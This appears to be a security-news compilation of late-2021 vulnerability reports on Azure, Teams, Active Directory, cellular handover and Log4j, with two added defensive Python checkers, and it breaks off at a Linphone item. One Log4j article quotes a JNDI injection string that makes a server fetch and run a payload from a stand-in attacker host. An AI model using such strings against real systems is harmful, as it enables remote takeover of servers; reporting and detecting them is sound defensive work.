

4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories
27.12.2021
Vulnerebility Thehackernews
A security flaw has been unearthed in Microsoft's Azure App Service that resulted in the exposure of source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years since September 2017.

The vulnerability, codenamed "NotLegit," was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations were undertaken to fix the information disclosure bug in November. Microsoft said a "limited subset of customers" is at risk, adding "Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers."

The Azure App Service (aka Azure Web Apps) is a cloud computing-based platform for building and hosting web applications. It allows users to deploy source code and artifacts to the service using a local Git repository, or via repositories hosted on GitHub and Bitbucket.

The insecure default behavior occurs when the Local Git method is used to deploy to Azure App Service, resulting in a scenario where the Git repository is created within a publicly accessible directory (/home/site/wwwroot).

While Microsoft does add a "web.config" file to the .git folder — which contains the state and history of the repository — to restrict public access, the configuration files are only used with C# or ASP.NET applications that rely on Microsoft's own IIS web servers, leaving out apps coded in other programming languages like PHP, Ruby, Python, or Node that are deployed with different web servers like Apache, Nginx, and Flask.

"Basically, all a malicious actor had to do was to fetch the '/.git' directory from the target application, and retrieve its source code," Wiz researcher Shir Tamari said. "Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks."

"Finding vulnerabilities in software is much easier when the source code is available," Tamari added.


Researchers Disclose Unpatched Vulnerabilities in Microsoft Teams Software
27.12.2021
Vulnerebility Thehackernews
Microsoft said it won't be fixing or is pushing patches to a later date for three of the four security flaws uncovered in its Teams business communication platform earlier this March.

The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could "allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and DoS'ing their Teams app/channels."

Of the four vulnerabilities, Microsoft is said to have addressed only one that results in IP address leakage from Android devices, with the tech giant noting that a fix for the denial-of-service (DoS) flaw will be considered in a future version of the product. The issues were responsibly disclosed to the company on March 10, 2021.

Chief among the flaws is a server-side request forgery (SSRF) vulnerability in the endpoint "/urlp/v1/url/info" that could be exploited to glean information from Microsoft's local network. Also discovered is a spoofing bug wherein the preview link target can be altered to point to any malicious URL while keeping the main link, preview image and description intact, allowing attackers to hide malicious links and stage improved phishing attacks.

The DoS vulnerability, which affects the Android version of Teams, could cause the app to crash simply by sending a message with a specially crafted link preview containing an invalid target instead of a legitimate URL. The last of the issues concerns an IP address leak, which also affects the Android app. By intercepting messages that include a link preview to point the thumbnail URL to a non-Microsoft domain, Positive Security said it's possible to gain access to a user's IP address and user agent data.

"While the discovered vulnerabilities have a limited impact, it's surprising both that such simple attack vectors have seemingly not been tested for before, and that Microsoft does not have the willingness or resources to protect their users from them," Positive Security's co-founder Fabian Bräunlein said.


Active Directory Bugs Could Let Hackers Take Over Windows Domain Controllers
27.12.2021
Vulnerebility Thehackernews
Microsoft is urging customers to patch two security vulnerabilities in Active Directory domain controllers that it addressed in November following the availability of a proof-of-concept (PoC) tool on December 12.

The two vulnerabilities — tracked as CVE-2021-42278 and CVE-2021-42287 — have a severity rating of 7.5 out of a maximum of 10 and concern a privilege escalation flaw affecting the Active Directory Domain Services (AD DS) component. Credited with discovering and reporting both bugs is Andrew Bartlett of Catalyst IT.

Active Directory is a directory service that runs on Microsoft Windows Server and is used for identity and access management. Although the tech giant marked the shortcomings as "Exploitation Less Likely" in its assessment, the public disclosure of the PoC has prompted renewed calls for applying the fixes to mitigate any potential exploitation by threat actors.

While CVE-2021-42278 enables an attacker to tamper with the SAM-Account-Name attribute, which is used to log a user into systems in the Active Directory domain, CVE-2021-42287 makes it possible to impersonate the domain controllers. Together, they effectively allow a bad actor who holds ordinary domain user credentials to gain access as a domain admin.

"When combining these two vulnerabilities, an attacker can create a straightforward path to a Domain Admin user in an Active Directory environment that hasn't applied these new updates," Microsoft's senior product manager Daniel Naim said. "This escalation attack allows attackers to easily elevate their privilege to that of a Domain Admin once they compromise a regular user in the domain."

The Redmond-based company has also provided a step-by-step guide to help users ascertain if the vulnerabilities might have been exploited in their environments. "As always, we strongly advise deploying the latest patches on the domain controllers as soon as possible," Microsoft said.
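Microsoft's step-by-step guide is the authoritative way to check for exploitation; the Python below is an added example, not Microsoft's code or the article's, that shows the core of such a check. It inspects computer-account change records (modelled on Windows Security event 4742, "A computer account was changed", a real event ID; the record layout is a constructed simplification) for a SAM-Account-Name that was rewritten to drop the trailing "$" or to collide with a domain controller's account name. The DC inventory and the sample events are constructed.

```python
from dataclasses import dataclass


@dataclass
class ComputerAccountChange:
    """Constructed, simplified record modelled on Windows Security event 4742
    ("A computer account was changed"); only the fields this check needs are kept."""
    event_id: int
    subject: str         # account that made the change
    target_account: str  # the computer account as it was, e.g. "WS01$"
    new_sam_name: str    # "SAM Account Name" from the Changed Attributes block, "-" if unchanged


# Constructed list of domain controller account names; in a real deployment this would
# be read from the Domain Controllers OU (assumption, not from the article).
DC_ACCOUNTS = {"DC01$", "DC02$"}


def suspicious_rename(rec, dc_accounts=DC_ACCOUNTS):
    """Return a reason string if the change fits the CVE-2021-42278 tampering pattern, else None."""
    if rec.event_id != 4742 or rec.new_sam_name in ("-", ""):
        return None
    new = rec.new_sam_name.upper()  # sAMAccountName comparisons are case-insensitive
    dcs = {d.upper() for d in dc_accounts}
    if new.endswith("$"):
        return None  # ordinary rename that keeps the computer-account suffix
    if new + "$" in dcs:
        return f"{rec.target_account} renamed to domain controller name {new!r} by {rec.subject}"
    return f"{rec.target_account} renamed to {new!r} without trailing '$' by {rec.subject}"


def scan(records, dc_accounts=DC_ACCOUNTS):
    """Run the check over a batch of records and return the findings in order."""
    findings = []
    for rec in records:
        reason = suspicious_rename(rec, dc_accounts)
        if reason:
            findings.append(reason)
    return findings


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    ComputerAccountChange(4742, "CORP\\helpdesk", "WS01$", "WS02$"),     # benign rename
    ComputerAccountChange(4742, "CORP\\jdoe", "JDOE-PC$", "DC01"),       # DC name, no '$'
    ComputerAccountChange(4742, "CORP\\jdoe", "JDOE-PC$", "-"),          # other attribute changed
    ComputerAccountChange(4741, "CORP\\jdoe", "JDOE-PC$", "JDOE-PC$"),   # creation, not a rename
    ComputerAccountChange(4742, "CORP\\svc-build", "LAB7$", "lab7"),     # '$' dropped, not a DC
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Only the second and fifth sample events are reported; the DC-name collision is the one that maps to the impersonation path the article describes.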


New Mobile Network Vulnerabilities Affect All Cellular Generations Since 2G
27.12.2021
Vulnerebility Thehackernews

Researchers have disclosed security vulnerabilities in handover, a fundamental mechanism that undergirds modern cellular networks, which could be exploited by adversaries to launch denial-of-service (DoS) and man-in-the-middle (MitM) attacks using low-cost equipment.

The "vulnerabilities in the handover procedure are not limited to one handover case only but they impact all different handover cases and scenarios that are based on unverified measurement reports and signal strength thresholds," researchers Evangelos Bitsikas and Christina Pöpper from the New York University Abu Dhabi said in a new paper. "The problem affects all generations since 2G (GSM), remaining unsolved so far."

Handover, also known as handoff, is a process in telecommunications in which a phone call or a data session is transferred from one cell site (aka base station) to another cell tower without losing connectivity during the transmission. This method is crucial to establishing cellular communications, especially in scenarios when the user is on the move.

The routine typically works as follows: the user equipment (UE) sends signal strength measurements to the network to determine if a handover is necessary and, if so, facilitates the switch when a more suitable target station is discovered.

While these signal readings are cryptographically protected, the content of these reports is not verified by the network, thus allowing an attacker to force the device to move to a cell site operated by the attacker. The crux of the attack lies in the fact that the source base station is incapable of handling incorrect values in the measurement report, raising the possibility of a malicious handover without being detected.

The new fake base station attacks, in a nutshell, render vulnerable the handover procedures, which are based on the aforementioned encrypted measurement reports and signal power thresholds, effectively enabling the adversary to establish a MitM relay and even eavesdrop, drop, modify, and forward messages transmitted between the device and the network.

"If an attacker manipulates the content of the [measurement report] by including his/her measurements, then the network will process the bogus measurements," the researchers said. "This is possible by imitating a legitimate base station and replaying its broadcast messages."

"Attracting" the device to a fake base station
The starting point of the attack is an initial reconnaissance phase wherein the threat actor utilizes a smartphone to collect data pertaining to nearby legitimate stations and then uses this information to configure a rogue base station that impersonates a genuine cell station.

The attack subsequently involves forcing a victim's device to connect to the false station by broadcasting master information block (MIB) and system information block (SIB) messages — information necessary to help the phone connect to the network — with a higher signal strength than the emulated base station.

In tricking the UEs to connect to the imposter station and forcing the devices to report bogus measurements to the network, the goal is to trigger a handover event and exploit security flaws in the process to result in DoS, MitM attacks, and information disclosure affecting the user as well as the operator. This not only compromises users' privacy but also puts service availability at risk.

"When the UE is in the coverage area of the attacker, the rogue base station has high enough signal power to 'attract' the UE and trigger a [measurement report], then the attacker has very good chances of forcing the victim UE to attach to his/her rogue base station [by] abusing the handover procedure," the researchers explained.

"Once the UE is attached to the attacker it could either enter in a camped mode due to a denial-of-service (DoS) attack and become unresponsive, or the attacker could establish a man-in-the-middle (MitM) relay building the basis for other advanced exploits."

As many as six security vulnerabilities (identified from A to F in the image above) have been identified in the handover process —

Insecure broadcast messages (MIB, SIB)
Unverified measurement reports
Missing cross-validation in the preparation phase
Random-access channel (RACH) initiation without verification
Missing recovery mechanism, and
Difficulty of distinguishing network failures from attacks
In an experimental setup, the researchers found all the test devices, including OnePlus 6, Apple iPhone 5, Samsung S10 5G, and Huawei Pro P40 5G, to be susceptible to DoS and MitM attacks. The findings were presented at the Annual Computer Security Applications Conference (ACSAC) held earlier this month.


Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability
20.12.2021
Vulnerebility Thehackernews
The issues with Log4j continued to stack up as the Apache Software Foundation (ASF) on Friday rolled out yet another patch — version 2.17.0 — for the widely used logging library that could be exploited by malicious actors to stage a denial-of-service (DoS) attack.

Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.

"Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups," the ASF explained in a revised advisory. "When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process."

Hideki Okamoto of Akamai Technologies and an anonymous vulnerability researcher have been credited with reporting the flaw. Log4j versions 1.x, however, are not affected by CVE-2021-45105.

It's worth pointing out that the severity score of CVE-2021-45046, originally classified as a DoS bug, has since been revised from 3.7 to 9.0, to reflect the fact that an attacker could abuse the vulnerability to send a specially crafted string that leads to "information leak and remote code execution in some environments and local code execution in all environments," corroborating a previous report from security researchers at Praetorian.

The project maintainers also noted that Log4j versions 1.x have reached end of life and are no longer supported, and that security flaws uncovered in the utility after August 2015 will not be fixed, urging users to upgrade to Log4j 2 to get the latest fixes.

The fixes are the latest in what's a highly dynamic situation as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Apache Log4j vulnerabilities by December 23, 2021, citing that the weaknesses pose an "unacceptable risk."

The development also comes as the Log4j flaws have emerged as a lucrative attack vector and a focal point for exploitation by multiple threat actors, including nation-backed hackers from the likes of China, Iran, North Korea, and Turkey as well as the Conti ransomware gang, to carry out an array of follow-on malicious activities. This marks the first time the vulnerability has come under the radar of a sophisticated crimeware cartel.

"The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit," AdvIntel researchers said. "the criminals pursued targeting specific vulnerable Log4j 2 VMware vCenter [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. and European victim networks from the pre-existent Cobalt Strike sessions."

Among the others to leverage the bug are cryptocurrency miners, botnets, remote access trojans, initial access brokers, and a new ransomware strain called Khonsari. Israeli security firm Check Point said it recorded over 3.7 million exploitation attempts to date, with 46% of those intrusions made by known malicious groups.


Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released
17.12.2021 
Vulnerebility Thehackernews
The Apache Software Foundation (ASF) has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed Log4Shell exploit was deemed as "incomplete in certain non-default configurations."

The second vulnerability — tracked as CVE-2021-45046 — is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be abused to infiltrate and take over systems.

The incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack," the ASF said in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but removes support for message lookups and disables JNDI by default, the component that's at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12.2 when it becomes available.

"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues," Ralph Goers of the ASF explained. "While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it."

JNDI, short for Java Naming and Directory Interface, is a Java API that enables applications coded in the programming language to look up data and resources such as LDAP servers. Log4Shell is resident in the Log4j library, an open-source, Java-based logging framework commonly incorporated into Apache web servers.

The issue itself occurs when the JNDI component of the LDAP connector is leveraged to inject a malicious LDAP request — something like "${jndi:ldap://attacker_controled_website/payload_to_be_executed}" — that, when logged on a web server running the vulnerable version of the library, enables an adversary to retrieve a payload from a remote domain and execute it locally.

The latest update arrives as fallout from the flaw has resulted in a "true cyber pandemic," what with several threat actors seizing on Log4Shell in ways that lay the groundwork for further attacks, including deploying coin miners, remote access trojans, and ransomware on susceptible machines. The opportunistic intrusions are said to have commenced at least since December 1, although the bug became common knowledge on December 9.

The security flaw has sparked widespread alarm because it exists in a near-ubiquitously used logging framework in Java applications, presenting bad actors with an unprecedented gateway to penetrate and compromise millions of devices across the world.

Spelling further trouble for organizations, the remotely exploitable flaw also impacts hundreds of major enterprise products from a number of companies such as Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler, and Zoho, posing a significant software supply chain risk.

"Unlike other major cyberattacks that involve one or a limited number of software, Log4j is basically embedded in every Java based product or web service. It is very difficult to manually remediate it," Israeli security company Check Point said. "This vulnerability, because of the complexity in patching it and easiness to exploit, seems that it will stay with us for years to come, unless companies and services take immediate action to prevent the attacks on their products by implementing a protection."

In the days after the bug was disclosed, at least ten different groups have jumped in on the exploit bandwagon and roughly 44% of corporate networks globally already have been under attack, marking a significant escalation of sorts. Furthermore, criminal gangs acting as access brokers have begun using the vulnerability to gain initial foothold into target networks and then sell the access to ransomware-as-a-service (RaaS) affiliates.

This also encompasses nation-state actors originating from China, Iran, North Korea, and Turkey, with Microsoft noting that the "activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives."

The large-scale weaponization of the remote code execution flaw has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add Log4Shell to its Known Exploited Vulnerabilities Catalog, giving federal agencies a deadline of December 24 to incorporate patches for the vulnerability and urging vendors to "immediately identify, mitigate, and patch affected products using Log4j."

Sean Gallagher, a senior threat researcher at Sophos, warned that "adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on," adding "there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability."

"The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere," Gallagher added.


Latest Apple iOS Update Patches Remote Jailbreak Exploit for iPhones
17.12.2021 
Vulnerebility Thehackernews
Apple on Monday released updates to iOS, macOS, tvOS, and watchOS with security patches for multiple vulnerabilities, including a remote jailbreak exploit chain as well as a number of critical issues in the Kernel and Safari web browser that were first demonstrated at the Tianfu Cup held in China two months ago.

Tracked as CVE-2021-30955, the issue could have enabled a malicious application to execute arbitrary code with kernel privileges. Apple said it addressed the race condition bug with "improved state handling." The flaw also impacts macOS devices.

"The kernel bug CVE-2021-30955 is the one we tried [to] use to build our remote jailbreak chain but failed to complete on time," Kunlun Lab's chief executive, @mj0011sec, said in a tweet. A set of similar kernel vulnerabilities were eventually harnessed by the Pangu Team at the Tianfu hacking contest to break into an iPhone 13 Pro running iOS 15, a feat that netted the white hat hackers $330,000 in cash rewards.

Besides CVE-2021-30955, a total of five Kernel and four IOMobileFrameBuffer (a kernel extension for managing the screen framebuffer) flaws have been remediated with the latest updates —

CVE-2021-30927 and CVE-2021-30980: A use after free issue that could allow a rogue application to run arbitrary code with kernel privileges.
CVE-2021-30937: A memory corruption vulnerability that could allow a rogue application to run arbitrary code with kernel privileges.
CVE-2021-30949: A memory corruption issue that could allow a rogue application to run arbitrary code with kernel privileges.
CVE-2021-30993: A buffer overflow issue that could allow an attacker in a privileged network position to execute arbitrary code.
CVE-2021-30983: A buffer overflow issue that could allow an application to run arbitrary code with kernel privileges.
CVE-2021-30985: An out-of-bounds write issue that could allow a rogue application to run arbitrary code with kernel privileges.
CVE-2021-30991: An out-of-bounds read issue that could allow a malicious application to run arbitrary code with kernel privileges.
CVE-2021-30996: A race condition that could allow a rogue application to run arbitrary code with kernel privileges.
On the macOS front, the Cupertino-based company patched an issue with the Wi-Fi module (CVE-2021-30938) that a local user on the system could exploit to cause unexpected system termination and even read kernel memory. The tech giant credited Xinru Chi of Pangu Lab with reporting the flaw.

Also fixed are seven security flaws in the WebKit component — CVE-2021-30934, CVE-2021-30936, CVE-2021-30951, CVE-2021-30952, CVE-2021-30953, CVE-2021-30954, and CVE-2021-30984 — that could potentially result in a scenario where processing specially crafted web content may lead to arbitrary code execution.

Additionally, Apple also resolved a couple of issues affecting Notes and Password Manager apps in iOS that could enable a person with physical access to an iOS device to access contacts from the lock screen and retrieve stored passwords without any authentication. Last but not least, a bug in FaceTime has been squashed, which otherwise may have leaked sensitive user information through Live Photos metadata.


Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild
17.12.2021 
Vulnerebility Thehackernews
Google has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the 17th such weakness to be disclosed since the start of the year.

Tracked as CVE-2021-4102, the flaw relates to a use-after-free bug in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw.

As it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, "it's aware of reports that an exploit for CVE-2021-4102 exists in the wild." This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.

CVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability CVE-2021-37975, also reported by an anonymous researcher, plugged in an update it shipped on September 30. It's not immediately clear if the two flaws bear any relation to one another.

With this latest update, Google has addressed a record 17 zero-days in Chrome this year alone —

CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 - Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in WebGL
CVE-2021-30563 - Type confusion in V8
CVE-2021-30632 - Out of bounds write in V8
CVE-2021-30633 - Use-after-free in Indexed DB API
CVE-2021-37973 - Use-after-free in Portals
CVE-2021-37975 - Use-after-free in V8
CVE-2021-37976 - Information leak in core
CVE-2021-38000 - Insufficient validation of untrusted input in Intents
CVE-2021-38003 - Inappropriate implementation in V8
Chrome users are recommended to update to the latest version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.


Apache Log4j Vulnerability — Log4Shell — Widely Under Active Attack
17.12.2021
Vulnerebility  Thehackernews
Threat actors are actively weaponizing unpatched servers affected by the newly identified "Log4Shell" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.

Netlab, the networking security division of Chinese tech giant Qihoo 360, disclosed that threats such as Mirai and Muhstik (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow their computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) earlier this September.

The latest development comes as it has emerged that the vulnerability had been under attack for more than a week prior to its public disclosure on December 10, and companies like Auvik, ConnectWise Manage, and N-able have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.

"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC," Cloudflare CEO Matthew Prince tweeted Sunday. "That suggests it was in the wild at least nine days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure." Cisco Talos, in an independent report, said it observed attacker activity related to the flaw beginning December 2.

Tracked as CVE-2021-44228 (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.

All that is required of an adversary to leverage the vulnerability is to send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.

"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers," Microsoft 365 Defender Threat Intelligence Team said in an analysis. "Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives."

In particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.

The situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an advisory, revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of "exploitation attempts in the wild," adding that it's pushing out patches to a number of its products.

If anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. "All threat actors need to trigger an attack is one line of text," Huntress Labs Senior Security Researcher John Hammond said. "There's no obvious target for this vulnerability — hackers are taking a spray-and-pray approach to wreak havoc."


Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk
12.12.2021
Vulnerebility  Thehackernews
The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.

Tracked as CVE-2021-44228 and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue.

"An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default."

Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.
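The three Log4j items on this page (CVE-2021-44228 here, CVE-2021-45046 in the 17.12 item and CVE-2021-45105 in the 20.12 item) state overlapping affected version ranges that are easy to misread. The following Python is an added example, not code from the articles or from the Apache project: it encodes the ranges exactly as stated (treating 2.12.2, the Java 7 fix release the 17.12 item names, as fixed; the later Java 6/7 back-port releases 2.3.1 and 2.12.3 postdate these articles and are not encoded), and it checks a log4j2.xml for the Context Lookup precondition that the ASF advisory quoted in the 20.12 item gives for the recursion DoS. The sample configuration is constructed.

```python
import re

# Pre-release tags sort before the final release of the same number:
# 2.0-alpha1 < 2.0-beta9 < 2.0-rc1 < 2.0
PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
FINAL_RANK = 3

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?")


def parse_version(text):
    """Turn a Log4j 2 version string ('2.0-beta9', '2.12.1', '2.16.0') into a comparable tuple."""
    m = VERSION_RE.fullmatch(text.strip())
    if m is None:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor, patch, tag, tag_num = m.groups()
    rank = PRERELEASE_RANK[tag] if tag else FINAL_RANK
    return (int(major), int(minor), int(patch or 0), rank, int(tag_num or 0))


def affected_cves(version):
    """Return the CVE ids from these articles that apply to the given Log4j 2 version.

    Ranges as the articles state them:
      CVE-2021-44228 (Log4Shell): 2.0-beta9 .. 2.14.1, fixed in 2.15.0
      CVE-2021-45046:             2.0-beta9 .. 2.12.1 and 2.13.0 .. 2.15.0,
                                  fixed in 2.16.0 (2.12.2 on the Java 7 branch)
      CVE-2021-45105 (recursion): 2.0-alpha1 .. 2.16.0 per the quoted ASF advisory,
                                  fixed in 2.17.0
    """
    v = parse_version(version)

    def within(low, high):
        return parse_version(low) <= v <= parse_version(high)

    cves = []
    # 2.12.2 sits inside the numeric range but is the Java 7 fix release the 17.12 item names.
    if within("2.0-beta9", "2.14.1") and v != parse_version("2.12.2"):
        cves.append("CVE-2021-44228")
    if within("2.0-beta9", "2.12.1") or within("2.13.0", "2.15.0"):
        cves.append("CVE-2021-45046")
    if within("2.0-alpha1", "2.16.0"):
        cves.append("CVE-2021-45105")
    return cves


# The CVE-2021-45105 DoS needs a non-default PatternLayout containing a Context Lookup
# such as ${ctx:loginId} or $${ctx:loginId}; this regex finds either spelling.
CTX_LOOKUP_RE = re.compile(r"\$\$?\{ctx:[^}]*\}")


def pattern_layouts(log4j2_xml):
    """Extract every PatternLayout 'pattern' attribute from a log4j2.xml document.

    A small regex extractor is used instead of a full XML parser so the check also works
    on configuration fragments copied out of a larger file.
    """
    return re.findall(r'<PatternLayout[^>]*\bpattern="([^"]*)"', log4j2_xml)


def assess(version, log4j2_xml):
    """Combine the version ranges with the configuration precondition for the recursion DoS."""
    cves = affected_cves(version)
    ctx_lookup = any(CTX_LOOKUP_RE.search(p) for p in pattern_layouts(log4j2_xml))
    return {
        "version": version,
        "cves": cves,
        # MDC-controlled recursion is only reachable when a Context Lookup sits in a PatternLayout.
        "recursive_lookup_reachable": "CVE-2021-45105" in cves and ctx_lookup,
        # 2.17.0 is the release the 20.12 item names as fixing all three.
        "upgrade_to": "2.17.0" if cves else None,
    }


# Constructed sample configuration (not from the articles): a non-default layout that
# interpolates a Thread Context Map field, exactly the precondition the advisory names.
SAMPLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{ISO8601} %-5p [%t] user=$${ctx:loginId} %c{1.} - %m%n"/>
    </Console>
  </Appenders>
</Configuration>"""

if __name__ == "__main__":
    for v in ("2.14.1", "2.15.0", "2.16.0", "2.17.0"):
        print(assess(v, SAMPLE_CONFIG))
```

Running it shows 2.15.0 still carrying two of the three CVEs and 2.16.0 carrying the recursion DoS, which is exactly why a fleet that stopped at the first or second patch is not done.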

Log4j is used as a logging package in a variety of different popular software by a number of manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft. In the case of the latter, attackers have been able to gain RCE on Minecraft Servers by simply pasting a specially crafted message into the chat box.

A huge attack surface
"The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year," said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. "Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit."

Cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the availability of a proof-of-concept (PoC) exploit. "This is a low skilled attack that is extremely simple to execute," Sonatype's Ilkka Turunen said.

GreyNoise, likening the flaw to Shellshock, said it observed malicious activity targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare noted that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K.

Given the ease of exploitation and the prevalence of Log4j in enterprise IT and DevOps, in-the-wild attacks aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately. Israeli cybersecurity firm Cybereason has also released a fix called "Logout4Shell" that closes the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the flaw.

"This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," Security expert Marcus Hutchins said in a tweet.


Critical Remote Hacking Flaws Disclosed in Linphone and MicroSIP Softphones
15.10.21 
Vulnerability  Thehackernews
Multiple security vulnerabilities have been disclosed in softphone software from Linphone and MicroSIP that could be exploited by an unauthenticated remote adversary to crash the client and even extract sensitive information like password hashes by simply making a malicious call.

The vulnerabilities, which were discovered by Moritz Abrell of German pen-testing firm SySS GmbH, have since been addressed by the respective manufacturers following responsible disclosure.

